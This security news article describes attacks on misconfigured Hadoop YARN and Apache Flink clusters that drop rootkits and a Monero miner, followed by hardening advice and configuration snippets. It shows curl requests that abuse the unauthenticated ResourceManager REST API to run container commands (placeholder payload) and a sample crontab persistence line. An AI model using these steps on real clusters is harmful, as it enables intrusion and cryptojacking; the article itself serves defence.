From rootkits to cryptomining
In the attack chain against Hadoop, the attackers first exploit the misconfiguration to create a new application on the cluster and allocate computing resources to it. In the application's container configuration, they place a series of shell commands that use the curl command-line tool to download a binary called “dca” from an attacker-controlled server into the /tmp directory and then execute it. A subsequent request to Hadoop YARN launches the newly deployed application and, with it, the shell commands.
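This abuse is possible because an unauthenticated ResourceManager REST API lets anyone who can reach it register an application and specify the shell commands its container runs. The following is a minimal sketch of what such a submission looks like; the host, application ID, and command below are placeholders, not the attackers' actual values:

```shell
# Step 1: request a new application ID from the (unauthenticated) ResourceManager
# REST API. Port 8088 is the default ResourceManager web port.
curl -s -X POST http://resourcemanager.example:8088/ws/v1/cluster/apps/new-application

# Step 2: submit an application whose ApplicationMaster container simply runs
# attacker-chosen shell commands. In the observed attack the command fetched the
# "dca" binary into /tmp with curl and executed it; a harmless echo stands in here.
curl -s -X POST -H "Content-Type: application/json" \
  http://resourcemanager.example:8088/ws/v1/cluster/apps \
  -d '{
        "application-id": "application_1700000000000_0001",
        "application-name": "benign-looking-app",
        "application-type": "YARN",
        "am-container-spec": {
          "commands": { "command": "echo command-supplied-by-attacker-runs-here" }
        }
      }'
```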
Dca is a Linux-native ELF binary that serves as a malware downloader. Its primary purpose is to download and install two rootkits and to drop another binary file called tmp on disk. It also sets up a crontab job that executes a script called dca.sh to ensure persistence on the system. The tmp binary bundled into dca itself is a Monero cryptocurrency mining program, while the two rootkits, called initrc.so and pthread.so, are used to hide the dca.sh script and the tmp file on disk.
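The exact crontab entry was not published, but this style of persistence typically amounts to a single scheduled line that keeps re-running the dropped script. A hypothetical equivalent (interval and path are illustrative, not taken from the report):

```shell
# Hypothetical crontab-based persistence: re-run the dropped script every
# 15 minutes so the miner is relaunched if it is killed or the host reboots.
*/15 * * * * /tmp/dca.sh >/dev/null 2>&1
```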
The IP address used to target Aqua's Hadoop honeypots was also used to target Flink, Redis, and Spring Framework honeypots (via CVE-2022-22965). This suggests the Hadoop attacks are likely part of a larger operation targeting different technologies, much like TeamTNT's operations in the past. When probed via Shodan, the IP address appeared to host a web server with a Java interface named Stage that is likely part of the Java payload implementation from the Metasploit Framework.
Mitigating the Apache Flink and Hadoop ResourceManager vulnerabilities
“To mitigate vulnerabilities in Apache Flink and Hadoop ResourceManager, specific strategies must be implemented,” Assaf Morag, a security researcher at Aqua Security, tells CSO via email. “For Apache Flink, it’s crucial to secure the file upload mechanism. This involves restricting the file upload functionality to authenticated and authorized users and implementing checks on the types of files being uploaded to ensure they are legitimate and safe. Measures like file size limits and file type restrictions can be particularly effective.”
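In Flink's own configuration, part of that advice maps onto a handful of flink-conf.yaml options. The sketch below assumes a reasonably recent Flink release (verify option names against your version): it disables jar uploads through the web UI and REST endpoint entirely and requires mutually authenticated TLS for the REST traffic that remains; keystore paths and passwords are placeholders:

```yaml
# flink-conf.yaml (sketch; verify option names for your Flink version)

# Disable jar upload / job submission through the web UI and REST endpoint,
# closing the upload path abused in these attacks.
web.submit.enable: false

# Require TLS with client authentication on the REST endpoint so only clients
# presenting a trusted certificate can reach it (placeholder paths/passwords).
security.ssl.rest.enabled: true
security.ssl.rest.authentication-enabled: true
security.ssl.rest.keystore: /opt/flink/conf/rest.keystore
security.ssl.rest.keystore-password: changeit
security.ssl.rest.key-password: changeit
security.ssl.rest.truststore: /opt/flink/conf/rest.truststore
security.ssl.rest.truststore-password: changeit
```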
Meanwhile, Hadoop ResourceManager needs authentication and authorization configured for API access. Possible options include integration with Kerberos (a common choice for Hadoop environments), LDAP, or other supported enterprise user authentication systems.
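At the Hadoop level, switching on Kerberos starts with two core-site.xml properties plus a Kerberos identity for the ResourceManager itself. The snippet below is only a sketch of that first step, with placeholder principal and keytab values; a full secure-cluster setup also requires keytabs and secure settings for every other daemon:

```xml
<!-- core-site.xml: switch Hadoop from "simple" (unauthenticated) mode to Kerberos -->
<property>
  <name>hadoop.security.authentication</name>
  <value>kerberos</value>
</property>
<property>
  <name>hadoop.security.authorization</name>
  <value>true</value>
</property>

<!-- yarn-site.xml: the ResourceManager's Kerberos identity (placeholder values) -->
<property>
  <name>yarn.resourcemanager.principal</name>
  <value>rm/_HOST@EXAMPLE.COM</value>
</property>
<property>
  <name>yarn.resourcemanager.keytab</name>
  <value>/etc/security/keytabs/rm.service.keytab</value>
</property>
```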
“Moreover, establishing access control lists (ACLs) or integrating with role-based access control (RBAC) systems can be effective for authorization configuration, a feature natively supported by Hadoop for various services and operations,” Morag says. It’s also worth considering agent-based security solutions for containers that monitor the environment and can detect cryptominers, rootkits, obfuscated or packed binaries, and other suspicious runtime behavior.
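As an illustration of the ACL side of that advice, YARN ships with service-level and queue-level ACLs that can be turned on in its own configuration files. The user and group names below are placeholders, and the queue ACL shown applies to the Capacity Scheduler specifically:

```xml
<!-- yarn-site.xml: enable YARN ACLs and restrict administrative operations
     to the yarn user and the hadoop-admins group (placeholder names) -->
<property>
  <name>yarn.acl.enable</name>
  <value>true</value>
</property>
<property>
  <name>yarn.admin.acl</name>
  <value>yarn hadoop-admins</value>
</property>

<!-- capacity-scheduler.xml: only members of the data-eng group may submit
     applications to the default queue (the leading space means "no users") -->
<property>
  <name>yarn.scheduler.capacity.root.default.acl_submit_applications</name>
  <value> data-eng</value>
</property>
```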